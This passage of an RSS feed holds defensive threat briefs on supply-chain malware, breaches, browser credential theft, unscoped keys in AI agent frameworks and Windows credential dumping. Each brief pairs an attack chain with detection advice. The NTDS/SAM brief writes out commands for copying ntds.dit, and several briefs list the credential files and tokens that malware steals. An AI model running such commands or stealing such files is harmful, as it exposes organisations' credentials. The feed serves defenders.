]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>llm</category><category>trivy</category></item><item><title>GlassWorm Supply Chain Attack Using Unicode Encoding and Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-03-glassworm-supply-chain/</link><pubDate>Tue, 24 Mar 2026 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-glassworm-supply-chain/</guid><description>The GlassWorm campaign employs Unicode variation selectors to conceal malicious code within supply chain artifacts, subsequently querying a Solana wallet for C2 URLs and exfiltrating sensitive credentials.</description><content:encoded><![CDATA[<p>The GlassWorm campaign, active since October 2025, targets software supply chains through malicious code concealed using Unicode variation selectors. This technique renders the payload virtually invisible in standard editors and code review processes. The attackers rotate extension IDs, npm package names, wallet addresses, and C2 infrastructure across multiple waves. A decoder component extracts the hidden bytes and executes them via <code>eval()</code> or <code>Function()</code>. The malware queries a Solana wallet to dynamically retrieve C2 URLs and proceeds to steal sensitive information, including <code>.npmrc</code>, <code>.git-credentials</code>, SSH keys (<code>id_rsa</code>, <code>id_ed25519</code>), and token environment variables such as <code>NPM_TOKEN</code>, <code>GITHUB_TOKEN</code>, and <code>OPEN_VSX_TOKEN</code>. Wave 5, observed in March, compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages. Defenders relying solely on IOC-based detections may struggle to keep pace with the rapid evolution of this threat.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Malicious code is injected into a software supply chain component (VS Code extension, npm package, etc.).</li>
<li>The payload is encoded using Unicode variation selectors, rendering it nearly invisible.</li>
<li>The victim installs or incorporates the compromised component into their development environment.</li>
<li>A decoder routine within the payload utilizes <code>codePointAt()</code> with arithmetic against <code>0xFE00/0xE0100</code> to reconstruct the original bytecode.</li>
<li>The decoded bytecode is executed using <code>eval()</code> or <code>Function()</code>.</li>
<li>The executed code queries a Solana wallet using RPC methods (<code>getTransaction</code>, <code>getSignaturesForAddress</code>) to retrieve C2 URLs.</li>
<li>The malware targets files such as <code>.npmrc</code>, <code>.git-credentials</code>, <code>id_rsa</code>, and <code>id_ed25519</code> for credential theft.</li>
<li>Stolen credentials and token environment variables (<code>NPM_TOKEN</code>, <code>GITHUB_TOKEN</code>, <code>OPEN_VSX_TOKEN</code>) are exfiltrated to the C2 server.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The GlassWorm campaign has successfully compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages in Wave 5 alone. Successful attacks can lead to the theft of sensitive credentials, potentially granting attackers unauthorized access to code repositories, package management accounts, and other critical infrastructure. This, in turn, can enable further supply chain attacks or intellectual property theft.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement the Unicode payload detection rule to identify suspicious densities of Unicode variation selector clusters in source code (see &ldquo;Unicode Payload Detection&rdquo; rule below).</li>
<li>Deploy the decoder detection rule to flag code patterns that use <code>codePointAt()</code> with specific arithmetic operations followed by <code>eval()</code> or <code>Function()</code> calls (see &ldquo;GlassWorm Decoder Detection&rdquo; rule below).</li>
<li>Monitor for network connections originating from non-blockchain applications using Solana RPC methods (<code>getTransaction</code>, <code>getSignaturesForAddress</code>), as described in the overview, to identify potential C2 activity.</li>
<li>Implement access controls and monitoring for sensitive files like <code>.npmrc</code>, <code>.git-credentials</code>, and SSH keys as described in the overview.</li>
<li>Use the <code>glassworm-hunter</code> tool linked in the references section to scan VS Code extensions, node_modules, pip site-packages, and git repos.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>unicode-encoding</category></item><item><title>Crunchyroll Data Breach via Telus Supply Chain Compromise</title><link>https://feed.craftedsignal.io/briefs/2026-03-crunchyroll-breach/</link><pubDate>Tue, 24 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-crunchyroll-breach/</guid><description>Crunchyroll suffered a data breach after a Telus employee was phished, leading to Okta credential theft and exfiltration of 100GB of customer data.</description><content:encoded><![CDATA[<p>On March 23, 2026, a data breach was reported at Crunchyroll, stemming from a compromise of their outsourcing partner, Telus, in India. The attackers successfully gained access to Crunchyroll&rsquo;s environment after a Telus employee was targeted with a spoofed phishing email. This email delivered malware that stole the employee&rsquo;s Okta credentials, granting the attacker a foothold into Crunchyroll&rsquo;s systems. The breach resulted in the exfiltration of approximately 100 GB of sensitive customer analytics and ticketing data. The threat actor had unauthorized access for a duration of 24 hours before the compromised credentials were revoked. This incident highlights the risks associated with supply chain vulnerabilities and the importance of robust security measures across all partner organizations.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> A Telus employee received a spoofed phishing email containing malware. (T1566)</li>
<li><strong>Malware Deployment:</strong> The employee interacted with the phishing email, leading to the deployment of an infostealer on their machine.</li>
<li><strong>Credential Theft:</strong> The malware captured the employee&rsquo;s Okta credentials. (TA0006)</li>
<li><strong>Authentication:</strong> The attacker used the stolen Okta credentials to authenticate into Crunchyroll&rsquo;s environment.</li>
<li><strong>Data Access:</strong> Upon successful authentication, the attacker gained access to customer analytics and ticketing data.</li>
<li><strong>Data Exfiltration:</strong> The attacker exfiltrated approximately 100 GB of data, including PII such as email addresses and IP addresses. (TA0010)</li>
<li><strong>Lateral Movement (Likely):</strong> While not explicitly stated, the attacker likely performed some level of lateral movement within the Crunchyroll environment to access the data.</li>
<li><strong>Objective Achieved:</strong> The attacker successfully exfiltrated sensitive customer data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The Crunchyroll data breach resulted in the exfiltration of 100 GB of customer analytics and ticketing data. This included personally identifiable information (PII) such as email addresses and IP addresses. The exposure of this data could lead to identity theft, phishing attacks targeting Crunchyroll customers, and potential financial fraud. The breach also damages Crunchyroll&rsquo;s reputation and erodes customer trust. The incident underscores the critical need for robust security measures across the entire supply chain to protect sensitive customer data.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement and enforce strict email security policies to prevent phishing attacks, focusing on employee training to recognize spoofed emails (T1566).</li>
<li>Deploy endpoint detection and response (EDR) solutions on all employee machines to detect and prevent malware deployment (TA0005).</li>
<li>Monitor Okta authentication logs for suspicious login activity, such as logins from unusual locations or at unusual times (TA0006).</li>
<li>Implement multi-factor authentication (MFA) for all user accounts, especially those with access to sensitive data, to mitigate the impact of credential theft (TA0006).</li>
<li>Conduct regular security audits of all third-party vendors and partners to ensure they meet the required security standards (TA0011).</li>
<li>Deploy the Sigma rule to detect the use of stolen Okta credentials based on anomalous login patterns.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>supply-chain</category><category>data-breach</category><category>credential-theft</category><category>phishing</category></item><item><title>GhostLoader Malware Targeting macOS via GitHub and AI Workflows</title><link>https://feed.craftedsignal.io/briefs/2024-01-ghostloader/</link><pubDate>Sat, 21 Mar 2026 13:03:03 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-ghostloader/</guid><description>GhostLoader malware leverages GitHub repositories and AI-assisted development workflows to distribute credential-stealing payloads targeting macOS systems.</description><content:encoded><![CDATA[<p>GhostLoader is a malware campaign observed using GitHub repositories and AI-assisted development workflows to deliver malicious payloads specifically designed to steal credentials from macOS systems. The threat leverages the trust associated with software repositories and the increasing adoption of AI tools in development to potentially bypass security measures. While the exact start date of the campaign is not specified, the report from Jamf highlights its recent emergence as a notable threat. Defenders should prioritize monitoring for suspicious activity related to GitHub repositories and unusual AI-driven development processes. The targeted scope appears to be macOS users who engage with software development resources and AI-related tools.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker creates a seemingly legitimate software repository on GitHub.</li>
<li>The repository contains a project with files that may appear benign or related to AI workflows.</li>
<li>A malicious script or binary, named GhostLoader, is included within the repository or downloaded as a dependency.</li>
<li>A user downloads or clones the repository, potentially enticed by AI-assisted development features or other seemingly useful functionality.</li>
<li>The user executes the GhostLoader script or binary on their macOS system.</li>
<li>GhostLoader executes, initiating the credential-stealing process.</li>
<li>Stolen credentials are collected and potentially exfiltrated to a remote server controlled by the attacker.</li>
<li>The attacker uses the stolen credentials to gain unauthorized access to user accounts or sensitive systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The GhostLoader malware directly targets macOS systems and focuses on credential theft. Successful attacks can lead to unauthorized access to sensitive user accounts, intellectual property, and confidential data. The number of victims and specific sectors targeted remain unclear, but the use of GitHub and AI workflows suggests a focus on developers or users involved in AI-related activities. The compromise of credentials can have severe consequences, including financial loss, data breaches, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events on macOS for execution of unusual or unsigned binaries in user directories, potentially indicative of GhostLoader execution (see process creation rule).</li>
<li>Implement network monitoring to detect connections to known malicious infrastructure or unusual data exfiltration patterns after the execution of scripts from cloned GitHub repositories.</li>
<li>Educate developers and users about the risks of downloading and executing code from untrusted sources, particularly those related to AI-assisted workflows.</li>
<li>Enable and review macOS system logs for suspicious activity related to credential access and keychain modifications.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>github</category><category>malware</category><category>macos</category><category>credential-theft</category><category>ai</category></item><item><title>VoidStealer Steals Secrets by Debugging Chrome</title><link>https://feed.craftedsignal.io/briefs/2024-01-23-voidstealer-chrome-debugging/</link><pubDate>Fri, 20 Mar 2026 05:48:21 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-23-voidstealer-chrome-debugging/</guid><description>VoidStealer leverages Chrome debugging capabilities to extract sensitive information, such as credentials and session cookies, directly from the browser's memory.</description><content:encoded><![CDATA[<p>VoidStealer is a threat actor utilizing advanced techniques to extract sensitive information from Google Chrome. This is achieved by abusing Chrome&rsquo;s built-in debugging features. The threat actor&rsquo;s primary goal is to steal credentials, session cookies, and potentially other sensitive data stored within the browser&rsquo;s memory. This allows for account takeover and lateral movement within compromised environments. The technique bypasses traditional security measures, as it operates within a legitimate browser process. This activity started being discussed in open source forums around March 2026 and represents a sophisticated approach to browser credential theft.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to the target system through an unspecified method (e.g., malware distribution, social engineering).</li>
<li>The attacker deploys VoidStealer, a custom tool or script designed to interface with Chrome&rsquo;s debugging API.</li>
<li>VoidStealer identifies running Chrome processes and attaches itself as a debugger.</li>
<li>The tool leverages the debugging interface to inspect Chrome&rsquo;s memory space.</li>
<li>VoidStealer searches for specific data structures and memory regions known to store credentials, session cookies, and other sensitive information.</li>
<li>The attacker extracts the targeted data from Chrome&rsquo;s memory.</li>
<li>Stolen data is exfiltrated to a command-and-control server controlled by the attacker.</li>
<li>The attacker uses the stolen credentials and session cookies for account takeover, lateral movement, and potentially data exfiltration from other systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful VoidStealer attacks can lead to significant data breaches, account takeovers, and financial losses. Organizations in any sector are at risk, especially those that heavily rely on web-based applications and services. The compromise of user credentials allows attackers to gain unauthorized access to sensitive corporate resources, intellectual property, and customer data. If successful, this can also lead to follow-on attacks, such as ransomware deployment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events for unexpected tools attaching to Chrome processes as debuggers to identify potential VoidStealer activity. Deploy the &ldquo;Suspicious Chrome Debugging Attachment&rdquo; Sigma rule to your SIEM.</li>
<li>Implement strict process whitelisting policies to prevent unauthorized applications from running on endpoints.</li>
<li>Enable and review Chrome&rsquo;s built-in security features, such as password protection and safe browsing, to mitigate the risk of credential theft.</li>
<li>Educate users about the risks of downloading and executing untrusted software.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>credential-theft</category><category>chrome</category><category>debugging</category></item><item><title>Unscoped API Keys in AI Agent Frameworks</title><link>https://feed.craftedsignal.io/briefs/2026-03-ai-agent-auth/</link><pubDate>Mon, 16 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-ai-agent-auth/</guid><description>A research report auditing popular AI agent projects found that 93% rely on unscoped API keys as the only authentication mechanism, leading to potential credential exposure, privilege escalation, and lateral movement within multi-agent systems.</description><content:encoded><![CDATA[<p>A recent audit of 30 popular AI agent frameworks, including OpenClaw, AutoGen, CrewAI, LangGraph, MetaGPT, and AutoGPT, reveals a widespread lack of robust authorization mechanisms. The report, published in March 2026, highlights that 93% of these frameworks rely solely on unscoped API keys for authentication. This means that any agent with access to the API key has full privileges, creating significant security risks. Furthermore, none of the frameworks provide per-agent cryptographic identity or revocation capabilities. In multi-agent systems, child agents inherit the full credentials of their parent agents, with no option for scope narrowing. This lack of granular control and isolation can lead to significant security breaches, including credential exposure and privilege escalation, as demonstrated by the 21,000 exposed OpenClaw instances leaking credentials and the 1.5 million API tokens exposed in the Moltbook breach.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains access to an unscoped API key, either through exposed instances like the 21,000 OpenClaw instances or breaches like the Moltbook incident affecting 1.5 million tokens.</li>
<li>The attacker leverages the unscoped API key to authenticate to the AI agent framework.</li>
<li>The attacker uses the API key to control an AI agent, potentially injecting malicious goals or code.</li>
<li>In multi-agent systems, the attacker exploits the inherited privileges of child agents to gain broader access.</li>
<li>The attacker leverages the agent&rsquo;s capabilities to access sensitive data or perform unauthorized actions.</li>
<li>The attacker escalates privileges by exploiting vulnerabilities within the agent framework or underlying system.</li>
<li>The attacker uses the compromised agent to move laterally within the system or network.</li>
<li>The attacker achieves their objective, which could include data theft, system disruption, or further compromise of the environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The widespread use of unscoped API keys and lack of proper authorization in AI agent frameworks creates a significant security risk. Successful exploitation can lead to data breaches, system compromise, and reputational damage. The report cites real-world incidents, including 21,000 exposed OpenClaw instances leaking credentials and 1.5 million API tokens exposed in the Moltbook breach, demonstrating the potential for widespread impact. The lack of per-agent revocation means that if one agent is compromised, the API key for all agents must be rotated, causing significant disruption.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement network monitoring to detect unusual traffic patterns originating from AI agent servers. Analyze outbound connections for connections to unusual or malicious domains (grantex.dev).</li>
<li>Audit the configuration of AI agent frameworks to identify instances using unscoped API keys. Prioritize upgrading or replacing frameworks that lack proper authorization controls.</li>
<li>Deploy the Sigma rule for detecting API key usage in command-line arguments or environment variables to identify potential credential exposure.</li>
<li>Monitor for access to sensitive data or resources by AI agents and implement least-privilege access controls.</li>
<li>Implement regular security audits and penetration testing of AI agent frameworks to identify and address vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ai-agent</category><category>api-key</category><category>authorization</category><category>credential-theft</category></item><item><title>Azure Identity Protection Atypical Travel Anomaly</title><link>https://feed.craftedsignal.io/briefs/2024-01-azure-atypical-travel/</link><pubDate>Tue, 02 Jan 2024 18:21:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-azure-atypical-travel/</guid><description>The Atypical Travel detection in Azure Identity Protection identifies potentially compromised user accounts by detecting geographically improbable sign-in activity, indicative of account compromise or misuse.</description><content:encoded><![CDATA[<p>The Atypical Travel detection in Azure Identity Protection is designed to identify instances where a user signs in from two geographically distant locations within a time frame that makes legitimate travel improbable. This anomaly indicates that an attacker may have compromised a user&rsquo;s credentials and is attempting to access resources from a different location. The alert is triggered by the &lsquo;unlikelyTravel&rsquo; risk event type within Azure&rsquo;s risk detection service. This capability helps defenders identify compromised accounts and prevent further damage such as data exfiltration or lateral movement within the environment. The detection is based on comparing current sign-in locations against the user&rsquo;s historical sign-in patterns, making it more accurate and less prone to false positives compared to simple geo-location based alerts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Credential Compromise:</strong> An attacker obtains a user&rsquo;s credentials through phishing, credential stuffing, or malware.</li>
<li><strong>Initial Access (Location A):</strong> The attacker uses the compromised credentials to sign in from a location that may be atypical for the user.</li>
<li><strong>Successful Authentication (Location A):</strong> The attacker successfully authenticates and gains access to Azure resources.</li>
<li><strong>Privilege Escalation (Optional):</strong> If the compromised account has sufficient permissions, the attacker attempts to escalate privileges within the Azure environment.</li>
<li><strong>Lateral Movement (Optional):</strong> The attacker uses the compromised account to move laterally to other resources or accounts within the Azure environment.</li>
<li><strong>Second Sign-in (Location B):</strong> Within a short timeframe, the attacker (or another attacker using the same credentials) signs in from a geographically distant location (Location B).</li>
<li><strong>Atypical Travel Alert:</strong> Azure Identity Protection detects the unlikely travel scenario based on the two geographically improbable sign-ins.</li>
<li><strong>Resource Access/Data Exfiltration:</strong> The attacker accesses sensitive resources or exfiltrates data from the environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful Atypical Travel attack can lead to unauthorized access to sensitive data, privilege escalation, lateral movement within the Azure environment, and potentially data exfiltration. The number of victims depends on the scope of the compromised user&rsquo;s access and the attacker&rsquo;s objectives. Organizations in all sectors are potentially at risk, as attackers often target user accounts with elevated privileges or access to critical data. The financial impact can include the cost of incident response, data breach notifications, and potential regulatory fines.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect Atypical Travel events (logsource: azure, service: riskdetection).</li>
<li>Investigate flagged sessions in the context of other sign-ins from the user, as suggested by the false positives guidance.</li>
<li>Implement multi-factor authentication (MFA) for all users to mitigate the risk of credential compromise.</li>
<li>Review and enforce conditional access policies to restrict access based on location and other factors.</li>
<li>Monitor user accounts for unusual activity, such as changes in sign-in patterns or resource access.</li>
<li>Implement account lockout policies to prevent brute-force attacks against user accounts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>azure</category><category>identity-protection</category><category>atypical-travel</category><category>account-compromise</category><category>credential-theft</category></item><item><title>NTDS or SAM Database File Copied</title><link>https://feed.craftedsignal.io/briefs/2024-01-01-ntds-sam-copy/</link><pubDate>Mon, 01 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-01-ntds-sam-copy/</guid><description>Detects copy operations of Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files, potentially exposing sensitive hashed credentials on Windows systems.</description><content:encoded><![CDATA[<p>This detection identifies attempts to copy the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM) files on Windows systems. These files contain highly sensitive information, including hashed domain and local credentials, and their unauthorized duplication can lead to significant credential compromise. The detection focuses on identifying specific command-line operations associated with copying these files, including the use of utilities like <code>cmd.exe</code>, <code>powershell.exe</code>, <code>xcopy.exe</code>, and <code>esentutl.exe</code>. The rule is designed for data generated by Elastic Defend and also supports third-party data sources like CrowdStrike, Microsoft Defender XDR, and SentinelOne Cloud Funnel, making it broadly applicable for organizations using these security solutions. The detection is based on observed attacker behaviors documented in reports such as those detailing Pysa/Mespinoza ransomware and techniques used for credential access.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> An attacker gains initial access to a Windows system, potentially through phishing or exploiting a vulnerability.</li>
<li><strong>Privilege Escalation:</strong> The attacker elevates privileges to gain necessary access to protected system files, possibly using exploits or misconfigurations.</li>
<li><strong>Volume Shadow Copy Creation (Optional):</strong> The attacker creates a Volume Shadow Copy (VSS) of the system drive to bypass file locking and access the NTDS.dit or SAM files without disrupting system operations. This may involve commands utilizing <code>vssadmin.exe</code>.</li>
<li><strong>NTDS.dit or SAM File Copy:</strong> The attacker uses command-line tools like <code>cmd.exe</code>, <code>powershell.exe</code>, <code>xcopy.exe</code>, or <code>esentutl.exe</code> to copy the NTDS.dit or SAM files to a different location.  Example commands include <code>copy C:\\Windows\\NTDS\\ntds.dit C:\\temp\\ntds.dit</code> or <code>esentutl.exe /y /vss /d</code>.</li>
<li><strong>Staging:</strong> The copied files are staged in a temporary directory or network share accessible to the attacker.</li>
<li><strong>Credential Extraction:</strong> The attacker uses tools like Mimikatz or other credential dumping utilities to extract plaintext passwords and hashes from the copied NTDS.dit or SAM files.</li>
<li><strong>Lateral Movement/Domain Dominance:</strong>  The attacker uses the extracted credentials to move laterally within the network, compromise additional systems, and potentially achieve domain dominance.</li>
<li><strong>Exfiltration (Optional):</strong> The attacker may exfiltrate the copied NTDS.dit or SAM file for offline analysis or further exploitation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack involving the copying of NTDS.dit or SAM files can lead to a complete compromise of an organization&rsquo;s Active Directory domain and/or local system credentials. This allows attackers to move laterally through the network, access sensitive data, and disrupt business operations. The impact can range from data breaches and financial losses to reputational damage and regulatory fines. Incidents like the Pysa/Mespinoza ransomware attacks highlight the real-world consequences of this type of credential access.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>NTDS or SAM Database File Copied</code> to your SIEM to detect suspicious copy operations involving NTDS.dit or SAM files. Tune the rule based on your environment.</li>
<li>Enable Sysmon process creation logging (Event ID 1) to ensure adequate coverage for the Sigma rules and investigation.</li>
<li>Monitor process command lines for the execution of <code>cmd.exe</code>, <code>powershell.exe</code>, <code>xcopy.exe</code>, and <code>esentutl.exe</code> with arguments related to copying NTDS.dit or SAM files as described in the rule <code>NTDS or SAM Database File Copied</code>.</li>
<li>Investigate and validate legitimate backup or disaster recovery processes, adding exceptions based on stable <code>process.executable</code>, <code>process.code_signature.subject_name</code>, <code>process.parent.executable</code>, bounded <code>process.command_line</code> source/destination, <code>user.id</code>, and <code>host.id</code> to minimize false positives.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>credential-access</category><category>windows</category><category>ntds</category><category>sam</category><category>credential-theft</category></item></channel></rss>